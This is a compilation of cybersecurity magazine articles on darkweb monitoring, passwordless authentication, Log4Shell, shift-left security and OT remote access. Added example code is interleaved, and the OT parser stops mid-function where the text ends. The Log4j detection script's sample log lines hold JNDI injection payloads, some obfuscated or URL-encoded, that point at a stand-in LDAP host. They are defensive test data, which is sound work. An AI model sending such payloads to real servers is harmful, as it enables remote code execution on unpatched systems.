As the COVID pandemic rages on and threatens to delay the restoration of normalcy, organizations have
had to rapidly transition to a digital model of working to ensure operational continuity and maintain their
competitive advantage. Experts claim that the pandemic has accelerated the adoption of digital
ecosystems by nearly a decade, with companies rushing to embrace the cloud, implementing a mobile-
first strategy, and employees working remotely. Unfortunately, this progressive trend has been marred
by a disproportionate increase in the frequency and sophistication of cyberattacks, especially
ransomware attacks on organizations, large and small alike. The consequences of this include
cybercriminal groups stealing/destroying sensitive data, disrupting business operations, and further
exposing the victims to unwanted media and regulatory scrutiny.
Surprisingly, Threat Actors routinely compromise even high-profile organizations with skilled
cybersecurity staff, state-of-the-art cybersecurity technology, adequate security budgets, and
demonstrably good cybersecurity processes. In fact, in many instances, the affected organizations were
found blissfully unaware that they were breached and only came to know about it via a third party. This
fact indicates that while organizations are very good at managing “known” risks and responding to attacks
that they can “see,” they are often oblivious to the “unknown” attacks that fly undetected under their
security radar. To quote Walter Johnson, one of the greatest baseball pitchers in sports history: “You
can’t hit what you can’t see.”
These risks are referred to as ‘unknown knowns’ (blind spots or information that the organization is
unaware of - but a potential adversary can exploit to their advantage). Organizations do have a way to
overcome this blind spot, however.
Cybercriminals have been known to frequent the “darkweb” (the hidden part of the internet accessible via
specialized browsers and networks to help preserve anonymity) to advertise and monetize the illegally
obtained information through successful cyber-attacks. This information includes stolen access
credentials (usernames and passwords) to the victim’s corporate network and business applications,
banking accounts, or sensitive personal/business information stolen during a successful malware attack
or a data breach. This information is procured by other cybercriminals who can leverage the compromised
account access to either steal funds, exfiltrate sensitive data or launch another advanced cyber-attack
(like a ransomware attack) on the victim organization.
Cybercriminals have also been observed discussing potential vulnerabilities that they have found in their
target companies on various darkweb forums.
With specialized darkweb monitoring services, organizations can become aware of such vulnerabilities
in their infrastructure and potentially compromised users or systems before their access credentials are
abused or misused in follow-up attacks. Based on this intelligence, organizations can immediately take
remedial measures such as resetting credentials, conducting a security assessment, or a forensic
investigation to identify and remediate malware or vulnerabilities to minimize or eliminate the risk of an
impending attack.
Leading organizations with mature cyber risk management practices have already been employing
darkweb monitoring as a critical asset in their security monitoring arsenal for quite some time. Of late,
they have also expanded the scope of darkweb monitoring to help manage their third-party/supply chain
cyber risks. Some of the key applications of darkweb monitoring for third party risk management include:
1. Identifying compromised credentials of their critical third parties or customers
2. Identifying and assessing their data exposure in the event of a third-party data breach
3. Assessing cyber risk exposure of a potential M&A target as part of due diligence
4. Identifying their customer data in a third-party data breach and initiating Data Breach Notification
processes as stipulated by various Data Protection Regulations such as GDPR
5. Continuous risk assessment and cyber risk monitoring of critical vendors or business partners
based on their data/access exposure on the darkweb
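As an added example, not from the article or from Cyble, here is a small triage routine of the kind such monitoring feeds into: it takes constructed darkweb exposure records, normalises and de-duplicates them, sorts them into own-domain, third-party and customer exposures, and maps each to the remedial actions listed above. The feed format, the domain lists and the 30-day window are assumptions made here.

```python
"""Triage of a constructed darkweb credential-exposure feed.

Added example, not part of the original article or of any Cyble product.
Feed format, domain lists and the 30-day window are assumptions made here.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import date

# Hypothetical asset inventory; a real deployment would load this from the
# CMDB, the vendor register and the customer list.
OWN_DOMAINS = {"example.com", "corp.example.com"}
THIRD_PARTY_DOMAINS = {"vendor-payroll.example", "mspartner.example"}
CUSTOMER_DOMAINS = {"customer-bank.example"}
RECENT_DAYS = 30  # plaintext exposures younger than this get a forensic look


@dataclass(frozen=True)
class Exposure:
    email: str
    plaintext: bool   # True if the password leaked in clear, not as a hash
    source: str       # name of the dump or forum post the record came from
    seen: date        # date the record was observed on the darkweb


def parse_feed(lines):
    """Parse 'email|plaintext-or-hash|source|YYYY-MM-DD' records.

    Malformed lines are skipped rather than raising: feeds scraped from
    forums are noisy and one bad line must not stop the run.
    """
    records = []
    for raw in lines:
        parts = [p.strip() for p in raw.split("|")]
        if len(parts) != 4 or "@" not in parts[0]:
            continue
        try:
            seen = date.fromisoformat(parts[3])
        except ValueError:
            continue
        records.append(Exposure(parts[0].lower(), parts[1] == "plaintext", parts[2], seen))
    return records


def classify(exposure):
    """Map an exposed account to the relationship the organisation has with it."""
    domain = exposure.email.rsplit("@", 1)[1]
    if domain in OWN_DOMAINS:
        return "internal"
    if domain in THIRD_PARTY_DOMAINS:
        return "third_party"
    if domain in CUSTOMER_DOMAINS:
        return "customer"
    return "unrelated"


def triage(lines, today):
    """Return {action: sorted emails}, keeping only the newest record per email."""
    latest = {}
    for e in parse_feed(lines):
        if e.email not in latest or e.seen > latest[e.email].seen:
            latest[e.email] = e
    actions = defaultdict(set)
    for e in latest.values():
        kind = classify(e)
        if kind == "internal":
            actions["force_password_reset"].add(e.email)
            if e.plaintext and (today - e.seen).days <= RECENT_DAYS:
                actions["forensic_review"].add(e.email)
        elif kind == "third_party":
            actions["notify_vendor"].add(e.email)
        elif kind == "customer":
            actions["breach_notification_assessment"].add(e.email)
    return {k: sorted(v) for k, v in actions.items()}


# Constructed sample feed (not real data); note the duplicate for alice and
# the two malformed lines.
SAMPLE_FEED = [
    "Alice@Example.com|plaintext|forum-dump-A|2022-05-20",
    "alice@example.com|hash|combo-list-B|2021-01-15",
    "bob@corp.example.com|hash|combo-list-B|2021-11-03",
    "carol@vendor-payroll.example|plaintext|forum-dump-A|2022-05-25",
    "dave@customer-bank.example|hash|combo-list-B|2022-04-02",
    "eve@unrelated.example|plaintext|forum-dump-A|2022-05-01",
    "this line is not a record",
    "frank@example.com|plaintext|forum-dump-A|not-a-date",
]


def run_sample():
    """Triage the constructed feed as of 1 June 2022."""
    return triage(SAMPLE_FEED, date(2022, 6, 1))


if __name__ == "__main__":
    for action, emails in run_sample().items():
        print(f"{action}: {', '.join(emails)}")
```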
As the cyber threat landscape evolves, it is no longer sufficient to rely solely on enterprise security tools
such as endpoint and perimeter security controls to safeguard organizational data. Organizations need
to look beyond the perimeter to gain continuous visibility and insight into what their adversaries know
about them and then remediate those issues before they can be exploited.
In this endeavor, darkweb monitoring has quickly emerged as a valuable tool in cyber defenders’ arsenals
- something every security-conscious organization should consider including as part of their cyber risk
management strategy.
About the Author
Kaustubh Medhe, Head of Research and Intelligence, at Cyble is a
seasoned cybersecurity and risk management professional with 20+ years
of diverse experience in consulting, practice management, and
cybersecurity operations. Before joining Cyble, Kaustubh gained extensive
experience in successfully managing security service programs and
engagements for several clients in the Insurance and Banking sector in
India, the Middle East, and APAC.
Kaustubh can be reached online at https://in.linkedin.com/in/kaustubh-medhe-8963204?trk=public_post_share-update_actor-image and at our
company website https://cyble.com/
Replacing Weak Authentication Methods with
Decentralized Security Infrastructure: The Move
Towards a Passwordless Future
By Frances Zelazny, CEO of Anonybit
Recent advancements in securing online accounts have effectively changed the way many of us envision
protecting our digital footprint - with top priorities of maintaining privacy and preserving online identity
security. While transformative, these advancements are not airtight means of security.
The continued flood of identity fraud within the past few years is insurmountable. In 2021 alone, 59% of
identity fraud victims attested to total account takeover, with an approximate average value of financial
losses of $12,000 across multiple accounts per victim. With $6 billion in personal losses each year,
account takeover has quickly become the leading form of fraud loss. As such, security experts across
the industry agree that the way forward is through strengthened authentication, starting with eliminating
passwords and replacing them with more secure factors, such as biometrics.
Strong authentication has traditionally been synonymous with methods of multi-factor authentication
(MFA), most of which still rely on the use of a password of some kind. However, the unfortunate truth
about passwords is that they are not only inherently broken but are also the most ubiquitous
authentication factor. Therefore, any implementation of multi-factor authentication is undermined by their
inclusion.
High-assurance strong authentication is what many industry experts believe to be a much superior
approach to securing accounts, in which multi-factor authentication is merged with biometrics. In the past
five years alone, high-assurance authentication has been adopted on a mass scale, climbing from 5% in
2017 to 16% in 2018, and even more so up to a whopping 24% in 2021. With high-assurance and
biometric authentication gaining traction in the U.S., the prevalence of password dependence still exists
among 49% of users across their accounts. Despite this surprising percentage, the growing awareness
of stronger authentication methods is promising for its implementation in the near future.
As it currently exists, the widespread adoption of high-assurance authentication has largely been led by
the FIDO Alliance. Since 2013, FIDO sought to enable strong authentication through an open set of
standards and specifications that link user devices to a secure online service and then rely on biometric
information stored on a particular device. Making this process more accessible appears to be the key to
its ubiquity, but there are also loopholes that need to be addressed as device biometrics only authenticate
the device owner, not the owner of the account they are trying to access. When this gap gets exploited
by attackers, it further contributes to the growing fraud rates that we are experiencing.
There are other issues that must be overcome to move towards the ubiquity of biometrics for consumer
applications. Currently, FIDO credentials are only generated for a specific device, meaning that each
device or browser must be separately provisioned in order to seamlessly authenticate access. Managing
multiple devices is not only difficult, but from a consumer perspective also degrades the experience. As
a result, the FIDO Alliance has called for the issuance of multi-device credentials that will enable users
to authenticate from anywhere, at any time, and from any device.
The transition to this model begs a few questions, the first being: how do you establish a high-enough
level of assurance with a new user device that will allow for the entire set of credentials or keys to be
entrusted to it? Secondly, how can digital assets be securely backed up and transferred without exposing
them to potential compromise in transit or at rest whilst in vendor storage? And lastly, how does all of this
happen across different device manufacturers who are disincentivized from working together?
Because biometric information is stored and bound to the specific device, it cannot be relied on to
authenticate from any other device, meaning the biometric samples from the original device will no longer
be available, and the fallback will once again be other authentication factors with lesser assurance levels.
Additionally, sending cryptographic assets to backup facilities exposes this information to eavesdropping
by cyberattackers in transit. Finally, if a vendor’s facility is hacked into, all cryptographic keys stored can
provide unfettered access to all of their accounts.
The solution to address both of these challenges lies in a decentralized cloud infrastructure that can
provide high levels of authentication assurance regardless of the device. Applying biometrics to a
decentralized cloud infrastructure aligns with the privacy principles of FIDO, where a user is in control of
their biometric data, and the biometric itself is not accessible across multiple parties.
While the technology to fully realize this is fairly new, companies are working to leverage techniques like
multi-party computing and zero-knowledge proofs in ways that break down biometric data into
anonymized pieces. These bits of data are then secured individually over a decentralized network and
can be matched in a decentralized manner as well, ensuring their security both at rest and in process.
The same infrastructure can also be used to secure cryptographic assets like FIDO credentials. Sharded
cryptographic assets can be distributed over a decentralized network, and only after a user authenticates
biometrically will these assets be released onto the user’s new device.
Looking to a much larger scale, in order to make this method of authentication ubiquitous, it is critical to
move past the inhibitors for adoption. Though many still cling to outdated methods of security and identity
authentication, there has never been a stronger call to utilize existing technologies and infrastructures to
foster the privacy and security of countless users. While it may take some time to achieve on a
widespread scale, decentralized biometrics cloud infrastructure provides the framework to propel us
towards a truly passwordless future.
About the Author
Frances is a seasoned marketing strategist and business
development professional with over 25 years of experience with
start-up and scale-up companies, primarily focused on
biometrics and digital identity, fintech, data and analytics and
cybersecurity. Frances has led marketing and strategy teams at
L-1 Identity Solutions, MyCheck, BioCatch and most recently,
Signals Analytics, and has run her own business consultancy
where she provided expertise in biometrics and identification
systems to growth companies. Frances has also served
government and multilateral organizations in promoting
biometrics best practices for social and economic development
and has been an outspoken advocate for consumer privacy and
the responsible use of biometrics. Her latest venture called Anonybit, which provides a ground-breaking
infrastructure for decentralizing biometric technology (not on the blockchain!) and creates a new category
for privacy-preserving identity management.
Frances can be reached online at LinkedIn and Twitter and at our company website https://anonybit.io/
The Password Is Dying. It’s Time for A DNR.
By Lucas Budman, CEO, TruU
As old years end and new ones begin, it’s natural to look ahead at the promise and possibility that lie in
front of us. What’s new? What’s near? What’s next?
But in cybersecurity, we already know what to expect in 2022: more breaches. Why? Because loss or
theft from data leaks has grown substantially year-over-year for so many consecutive years now we’d be
fooling ourselves to think 2022 will be any different. Even with evolving new threats and the growth of
nation-state actors in the ransomware business, we want to believe our current lines of defense will hold.
The briefest history shows us the folly in our thinking. We’re not safe. Our defenses will not hold. Period.
And the biggest gap in our defense is…us. You. Me. People. Our cyber hygiene and habits are not what
they need to be to truly protect sensitive data and information, and for the most part, the technologies we
use come with too much friction. The user experience is so poor that we spend as much (or more) time
circumventing onerous technology and security controls than we do in building the habits and behaviors
that would reduce overall risk in our organizations.
Compromised credentials and poor access controls, both of which involve usernames and passwords,
are the reason some 15 billion identity records circulate across the dark web today. The problem has
become so critical that last year’s OWASP top 10 named “Broken Access Control” as the number-one
risk. To reverse this trend and literally save us from ourselves, from our lax behaviors and ineffective
controls, we must look to technologies that reduce or eliminate human error by design.
Organizations the world over have woken up to the fact that compromised credentials, at the root of
more than 80% of all breaches, are their biggest threat. In other words, awareness of the problem has
finally caught up with what the data have demonstrated for years, and we now recognize that addressing
a few key access points with passwordless options or biometric solutions doesn’t go far enough to
address the root cause.
2022 is the year to go passwordless.
Because passwords are easy to discover and exploit, and because they’re plentiful, if organizations
don't embrace the passwordless trend, bad actors will continue logging in with stolen passwords and
companies will continue to suffer breaches.
2022 is also the year to stop pretending that existing two-factor (2FA) and multifactor (MFA)
authentication tools will deliver anything more than marginal improvements to a poor security posture.
The massive levels of user friction and workflow interruption alone are good reasons to stop investing in
2FA/MFA because they hinder widespread adoption and use of the technology; the fact that such solutions
also do nothing to curtail phishing attacks, ransomware, credential stuffing, man-in-the-middle, SIM
swaps, push bombing, and other popular attack vectors means organizations cannot depend on them to
secure the devices and work products of remote and hybrid workers.
We’re seeing more and more business leaders starting to prioritize budgets and fast-track proof-of-
concept (POC) engagements to find passwordless solutions that will work across the enterprise at every
access point. Successful deployments will reduce IT complexity, streamline use-case support, and offer
a seamless user experience, one that enables people to log in easily and securely from anywhere in the
world without using vulnerable passwords.
Advanced passwordless solutions are embedded in continuous authentication models that remove the
zero-sum trade-off between better security and a better user experience by allowing users to authenticate
into workstations, physical doors, and other sensing assets simply by being close to them; they also
deploy AI/ML to approximate distance from sensing objects without requiring pairing or further
interactions to work. They use behavior pattern analysis to authenticate intended users and remove
access from unintended users. Importantly, they also empower enterprises to consolidate solutions,
remove complexity, reduce costs, and deliver better security outcomes while supporting robust
administration tools and workflow-based execution to mitigate complicated security and access
requirements.
Beyond usability and security, organizations are embracing the maxim that continuous authentication
solutions must also be more than just a biometric alternative to passwords, and they must respect user
privacy too. Users should have complete control over and visibility into the data that are collected and
how such data are used. Modeling should be done in a privacy-preserving manner with clear, defined
outcomes, while AI/ML models should be used strictly to facilitate user authentication, not for data
collection or monitoring.
As 2022 progresses, we expect the removal of threats from compromised credentials to snowball
as more and more enterprises decrease unnecessary spend on IAM tools underpinned with some sort of
password requirement and spur investment in innovative and robust passwordless technologies that can
protect across the enterprise while delivering a frictionless experience for employees. Organizations that
prioritize passwordless deployments will foster more effective risk-reduction strategies, improve cyber
resilience, lower costs, and remove user strife from the equation. It’s time to act.
About the Author
Lucas Budman is the CEO of TruU. He was formerly the CTO of the
Advanced Solutions Group at CenturyLink, a Fortune 500 global
technology company. CenturyLink acquired his previous company
Cognilytics, a machine learning platform company focused on financial
risk and cybersecurity, where he was a founding member and CTO. Prior
to CenturyLink’s acquisition, Lucas was founding member and CTO of
MyCollege Foundation, a Bill and Melinda Gates funded non-profit
whose mission is to provide higher education pathways to low-income
young adults.
Lucas holds an M.S. in Finance, a B.S. in Computer Science, and an
unfinished postgraduate degree in Computer Science - all from the University of Colorado. In his spare
time, he is an avid skier, former racer and enjoys road cycling.
Lucas can be reached online at https://www.linkedin.com/in/lbudman/ and at our company website
https://truu.ai/
Analysing the true threat of Log4j
By Tom McVey, Sales Engineer EMEA, Menlo Security
In December 2021 the cybersecurity industry could be found reflecting on another difficult year, defined
by further spikes in both the sophistication and volume of threats used by attackers.
Following on from a similar pattern in 2020, attackers continued to capitalise on growing digital footprints
and new vulnerabilities, a trend that has only continued to accelerate since the pandemic first induced
a rapid increase in digitalisation efforts.
Amidst such reflections, Log4Shell emerged as one of the most threatening vulnerabilities facing
companies to date.
Log4Shell is a weakness that was discovered in the Log4j Java logging library (CVE-2021-44228). Log4j is a
widespread piece of software typically used to record events such as errors and routine system
operations. The 404 error message that is received when clicking on a bad link is one such example of
Log4j in action, both telling the user that the webpage doesn’t exist and recording the event in a log.
Log4Shell works by abusing a specific feature in Log4j that allows users to specify custom code for
formatting a log message. The challenge lies in the fact that this code can be used for more than just
formatting log messages. Indeed, Log4j allows third-party servers to submit software code that can
perform all kinds of actions on the targeted computer, opening the door to a range of nefarious activities.
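To show what the detection side of this looks like, here is an added example (not the article's or Menlo Security's code) that scans constructed web-server log lines for Log4j lookup strings, undoing URL encoding and the nested lower/upper/default lookups that can hide the word "jndi" from a naive string match. The log format, the sample lines and the set of obfuscations handled are assumptions.

```python
"""Flag Log4j lookup strings in web-server log lines.

Added example, not code from the article or from Menlo Security. The log
format, the sample lines and the obfuscations handled are assumptions.
"""
import re
from urllib.parse import unquote

# ${lower:X} / ${upper:X} case lookups and ${anything:-X} default-value lookups
# are the nesting tricks that split up the literal "jndi"; collapse them first.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _apply_case(match):
    text = match.group(2)
    return text.lower() if match.group(1).lower() == "lower" else text.upper()


def normalise(text, max_rounds=10):
    """Collapse nested lookups inside-out until a round changes nothing."""
    for _ in range(max_rounds):
        collapsed = _CASE_LOOKUP.sub(_apply_case, text)
        collapsed = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), collapsed)
        if collapsed == text:
            break
        text = collapsed
    return text


def classify_line(line):
    """'jndi' for a JNDI lookup, 'lookup' for any other ${...}, None otherwise."""
    text = normalise(unquote(line))   # percent-decode first: %24%7B is ${
    if _JNDI_LOOKUP.search(text):
        return "jndi"
    if "${" in text:
        return "lookup"   # worth a look, but not the exploit pattern itself
    return None


def scan(lines):
    """Return [(line_number, severity, normalised_line)] for every input line."""
    return [(i, classify_line(ln), normalise(unquote(ln)))
            for i, ln in enumerate(lines, 1)]


# Constructed access-log lines (TEST-NET addresses, not real traffic): a benign
# request, a plain lookup in the User-Agent, a nested/obfuscated one, a
# percent-encoded one in the query string, and a harmless date lookup.
LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:10:01:00 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:10:02:13 +0000] "GET /login HTTP/1.1" 200 320 "-" '
    '"${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:03:44 +0000] "GET /api HTTP/1.1" 404 0 "-" '
    '"${${lower:j}${::-n}${::-d}${lower:i}:${lower:ldap}://203.0.113.10/x}"',
    '10.0.0.11 - - [10/Dec/2021:10:04:01 +0000] '
    '"GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.10%2Fb%7D HTTP/1.1" 200 88 "-" "curl/7.68"',
    '10.0.0.12 - - [10/Dec/2021:10:05:09 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 200 44 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for number, severity, text in scan(LOG_LINES):
        if severity:
            print(f"line {number}: {severity}: {text}")
```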
Ease of exploitation and HEAT
A major problem with Log4j is not just its potential to cause immense damage; it is also relatively
simple to exploit using Log4Shell.
Given this combination, the National Institute of Standards and Technology (NIST) gave it a rare 10 out
of 10 rating on its Common Vulnerability Scoring System (CVSS). With such a low bar for using the
exploit, it can be leveraged by a wide range of attackers with malicious intent.
This is demonstrated by the sheer volume of attacks that occurred once the vulnerability was made public.
With the first exploitation attempt recorded within just nine minutes, a further 830,000 were made in the
three days thereafter, prior to a patch being released.
What is equally concerning is the fact that a proof-of-concept attack using the Log4j vulnerability had
been detected eight days earlier, suggesting that the vulnerability was both known and possibly exploited
prior to this time.
Indeed, the evidence points to one outcome: that multiple attackers have successfully infiltrated various
enterprise servers through the Log4Shell exploit.
It is likely that they won't have given away any obvious sign of their successes. Instead, they will be
probing networks and identifying where they can obtain the most value or, in the eyes of their victims,
inflict the most damage.
This is a common trend amongst attackers, allowing them to extract the most value possible from their
exploits. The infamous and devastating SolarWinds attack affecting US government agencies and
various Fortune 500 firms is a prime example, with the attackers having gained access to the company
network nine months before an attack had been identified.
Therefore, we expect to see several attacks stemming from the Log4j vulnerability to emerge throughout
the entirety of 2022 and even beyond, with Highly Evasive Adaptive Threats (HEAT) being a critical tool
in the arsenal of attackers that will enable them to conduct their works under the radar.
HEAT attacks are defined by specific techniques used by attackers to evade existing security defences.
With a full understanding of all the technology integrated into the existing security stack, threat actors are
leveraging data obfuscation tactics such as HTML smuggling and Javascript obfuscation as mechanisms
to avoid detection.
HEAT attacks present many challenges of their own to security professionals. Several HEAT attack
characteristics actually serve useful purposes, and therefore can’t be blocked altogether. Instead,
workarounds are needed to ensure that HEAT attacks are prevented.
Zero trust and isolation
With Log4j being both highly accessible and potentially hugely costly, a rising tide of attackers driven
by a thriving ransomware-as-a-service landscape, and the growing prevalence of HEAT attacks, the task
facing security teams is difficult.
However, there are some steps that can be taken to remedy such scenarios. This needs to start with a
shift in mindset away from post-breach detection and mitigation to prevention with a zero trust approach.
With a zero trust approach, organisations can work to stop threats in their tracks before they reach the
endpoint, something that is entirely necessary today given the evasive actions of modern attackers. It
recognises trust in a network as a vulnerability and therefore advocates that all traffic, from emails and
documents to websites and videos, should always be verified.
At Menlo, we recommend that organisations abandon traditional detect and respond approaches to
cybersecurity and implement a zero trust approach powered by isolation, a technology that ensures that
no active content from the internet is ever executed on the user’s endpoint.
Critically, this protects IT infrastructure from ransomware and other HEAT attacks regardless of patch
status. Shutting off any access to the endpoint is the only way to stop these attacks with 100 percent
certainty.
About the Author
Tom is a Solution Architect at Menlo Security for the EMEA region. He
works closely with customers to meet their technical requirements and
architects web and email isolation deployments for organisations across
different industries. Prior to Menlo Security, Tom previously worked for
LogRhythm and Varonis.
Are We Shifting Left Enough
By Douglas Kinloch, VP of Business Development, PACE Anti-Piracy
The expression “shift left” is rapidly becoming mainstream in discussions about IT and Software security,
but what does it actually mean? To most, it’s the principle of thinking about security earlier in the planning
stage for any system or network, or in the designing and development of software applications.
But is it far enough?
Endpoint security has been the be-all and end-all of network security for many years and yet we still see
issues, from Log4J and Supply Chain attacks to Mobile Apps as an attack surface compromising
supposedly secure API. The question for vendors and their customers is simple: are the burgeoning
billions of endpoints, driven by the IoT revolution, able to be secured, even if we all “Shift Left”?
I mean, if this were possible it would have been achieved by now, and security consultants & red teamers
could retire?
“Shift Left” is in danger of becoming a buzzword, much as “End Point” did 20 years ago. In software
development, it is clear that the idea of moving security awareness from being traditionally the last thing
considered before shipping to something every developer understands, can implement, and can act on
accordingly has to be a good thing.
Part of the problem we see in the technology space today, from Automotive and Health IoT to Cloud
Services and AI/ML, has been the assumption that every component can be trusted to have been
developed securely within organizations and their supply chains of dozens of vendors. It’s clear that in
the parade of multiple Agile Developers, (DevOps, ITOps, MLOps, DataOps, ModelOps, AIOps, SecOps,
DevSecOps and who knows how many other “xxxxxOps”) blind trust has been relied upon as a business
process.
“Zero Trust” is another buzzword that may travel hand-in-hand with Shift Left, which makes some sense,
but as many are beginning to point out there is no single Zero Trust silver bullet, it’s a process. As a
process, it needs to be the default setting of any designer of any system relying on IT networks,
connectivity, or software.
The foundational issue, however, goes back to the individual “endpoints” themselves.
This correspondent has been accused of being a professional paranoiac while working in the Mobile
Security and Mobile Fintech space, and the accusation is fair. I would suggest that what we need is far
more to be similarly lacking in trust and doubtful about all the marketing and other hype.
So how should developers and analysts begin to think about answering the challenge?
- Secure coding so vulnerabilities aren’t created in the first place
- Use programming languages that are not inherently insecure (to run on platforms that can’t be secured)
- Security review & source code scanning of applications before finalization
However, we have to assume every connected 5G IoT device, Medical Device or Smart Phone is
accessible to attackers. If they can reach it, they will begin to understand the Applications running on the
device and use these as an attack surface for the application itself, or worse (via APIs) the network with
which it communicates. This problem is magnified many times in Smart Phones by the simple existence
of App Stores - anyone can download apps before they reach the intended devices.
Securing the compiled applications is ever more important.
The bullets above are fairly standard and are (thankfully) now entering the mainstream as awareness
grows of Zero Trust and Shift Left, but there is another process that is missing.
Application Protection, sometimes known as RASP (Runtime Application Software Protection), is a
technique that can protect an application, and any security-sensitive code, such that the good work done in
the three bullets above can’t be undone by attackers using Static and Dynamic Analysis (or decrypt tools)
to understand and compromise applications by re-inserting whole new vulnerabilities.
This protection is applied during the development phase, before DevOps or DevSecOps groups need to
become involved, or better still with these skills evident in the development team.
The assumption that compiled app code will be accessed, and that attackers have the tools and skills
changes the security calculus completely.
Zero Trust means just that and developers protecting their code understand that the actual end-point is
not the device, or even the application within that device, but is the source code on the developers’
machine - before it’s even compiled.
So when you decide to Shift Left, as we did, ask yourself, “how far?”
About the Author
Doug Kinloch is VP of Business Development for PACE Anti-Piracy Inc. Doug Kinloch is VP of Business Development,
Europe and Director of PACE AP Europe Ltd, managing the local
company and working as part of the overall PACE Business team.
A veteran of the Scottish Tech and Start-up scene, he has over a
decade of experience working to market innovative Software
Security as applied to Financial Services, Digital ID and Content
Protection, including managing relationships with the international
and local Card Schemes and major banks.
Doug can be reached online at dougk@paceap.com and at our
company website http://www.paceap.com
Threats Against Critical Infrastructure Are
Looming, Agencies Must Safely Modernize
OT Systems
Amid Recent Geopolitical Tensions, There Have Been Serious Concerns Regarding the
Vulnerability of The United States’ Critical Infrastructure.
By Josh Brodbent, Director of Public Sector Solutions Engineering, BeyondTrust
The Cybersecurity and Infrastructure Security Agency (CISA) identifies 16 critical infrastructure sectors
whose operations are “so vital to the United States that their incapacitation or destruction would have a
debilitating effect on security, national economic security, national public health or safety, or any
combination thereof.” The threat of such an attack is credible enough to warrant official, repeated
warnings from the White House urging the public and private sectors to bolster their “cyber defenses
immediately.”
Converging Operational and Information Technology
Historically, critical infrastructure sectors relied heavily on operational technology (OT) rather than
information technology (IT). Until recently, OT systems ran on proprietary protocols and software, lacked
automation, required manual administration by people, and had no external connectivity. Today, the OT
landscape is increasingly converging with IT systems. However, OT professionals and IT experts often
lack a comprehensive understanding of their counterparts, which further complicates an already
precarious union.
Convergence allows for revolutionary new capabilities and efficiencies, such as the ability for OT systems
to produce valuable data analytics. However, the shift from largely closed systems to open ones has
generated myriad cybersecurity risks. In fact, cyberattacks against critical infrastructure skyrocketed
2,000% in 2019. Vulnerabilities were further exacerbated by the global shift to remote work post-pandemic.
The need for employees to connect remotely to OT systems from personal devices on their home
networks meant even fewer security controls were in place on the IT end when compared to traditional
corporate environments. These remote connections have blurred the IT-OT segmentation and expanded
the attack surface by providing new entry points for hackers to exploit.
The Air-Gap Argument
Some could reasonably speculate that the benefits of convergence are not worth the potential cost,
and instead argue for a practice known as “air-gapping,” in which OT and IT systems are completely
segregated and the OT system is entirely isolated from the outside world. However, in our modern, digital
world, such isolation is nearly impossible to maintain, and accidental convergence should be anticipated.
For example, electromagnetic radiation, FM frequency signals, thermal communication channels, cellular
frequencies, near-field communication (NFC) channels and even LED light pulses can expose critical
systems to malicious activity. Something as innocuous as an external laptop being used as an HMI or a
USB thumb drive used for OT purposes can accidentally converge an IT and OT system, opening the
door for serious exploitation.
Therefore, organizations that adhere to an air-gapped security model are the most at risk because they
do not implement any additional security measures. As such, convergence is inevitable, and largely
beneficial, when executed securely.
As industrial systems become further intertwined with IT, they become increasingly vulnerable. Many
have opted to use Virtual Private Networks (VPNs) to secure their OT infrastructure, but VPNs lack the
advanced security features, visibility, and scalability necessary to fully protect a converged system.
Protecting Converged Systems Requires Visibility, Auditing and Least Privilege
Visibility is key to any advanced, secure remote access system. It is imperative that system operators
can monitor who is accessing the network, what they are doing, and for how long they are connected to
the network. “Always-on” VPNs provide little to no visibility or control over individual user activity.
Alternatively, by restricting unapproved protocols and directing approved sessions to a predefined route,
the potential attack surface is reduced.
A thorough understanding of a system’s data makes it easy to detect anomalous events. This visibility
enables informed analysis. The ability to capture detailed session data for all remote access sessions,
and to review that data in real time, is paramount to securing an OT network. Capturing detailed session
logs creates an audit trail that enables accountability and compliance.
Of note, auditing is a primary example of how the differences between OT and IT systems management
can cause friction. To assess an IT system, operators typically use a technique known as scanning, but
OT systems do not respond well to scanning. In fact, an entire OT system could be disrupted if it were
scanned in typical IT fashion. Instead, OT systems should be queried in their native protocols.
Understanding how to safely reconcile the differing practices of IT and OT systems is critical in the
process of convergence and is one of the many reasons IT and OT professionals should better educate
one another.
Converged networks should also follow the principle of least privilege (PoLP), a core component of any
zero trust architecture (ZTA). PoLP is the idea that any user, program, or process should only have the
bare minimum privileges necessary to perform its function. PoLP dramatically mitigates the risk of a
cyberattack by restricting a bad actor's ability to move laterally within a system.
Zero trust has become profoundly relevant for OT industrial control systems, as modern cloud-based
technologies have blurred or dissolved the idea of traditional firewalls and network-zoned perimeters.
VPNs permit unnecessary access for operators, suppliers, and vendors, meaning that they do not adhere
to the PoLP or zero trust. Troublingly, VPNs often store privileged credentials insecurely. To protect our
nation’s most valuable resources, role-specific access and individual accountability for shared accounts
must be implemented.
Converged systems are often more exploitable because of the challenges inherent in auditing them,
meaning that when remotely accessing OT infrastructure, a zero trust mindset is critical.
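The session auditing and least-privilege checks described above can be made concrete. The following is an added example, not code from the article or from BeyondTrust: it parses a constructed remote-access session log and flags sessions that use a protocol not approved for the user's role, run longer than the role's limit, or use a shared account without a named operator. The record format, the role policy and the sample records are all assumptions made for illustration.

```python
"""Audit remote-access session records against a least-privilege policy.

Added example (not from the article or BeyondTrust): the session record
format, role policy and sample data are all constructed for illustration.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta

# Hypothetical per-role policy: which protocols a role may use to reach OT
# assets and the longest session it may hold.  Nothing here is vendor-specific.
ROLE_POLICY = {
    "plc_engineer": {"protocols": {"ssh", "vnc"}, "max_hours": 4},
    "vendor_support": {"protocols": {"rdp"}, "max_hours": 2},
    "historian_analyst": {"protocols": {"https"}, "max_hours": 8},
}


@dataclass
class Session:
    session_id: str
    account: str        # account used to authenticate
    operator: str       # named human behind the account ("" if unattributed)
    role: str
    protocol: str
    target: str
    start: datetime
    end: datetime


def parse_session_line(line: str) -> Session:
    """Parse one pipe-separated session record (constructed format)."""
    sid, account, operator, role, proto, target, start, end = line.split("|")
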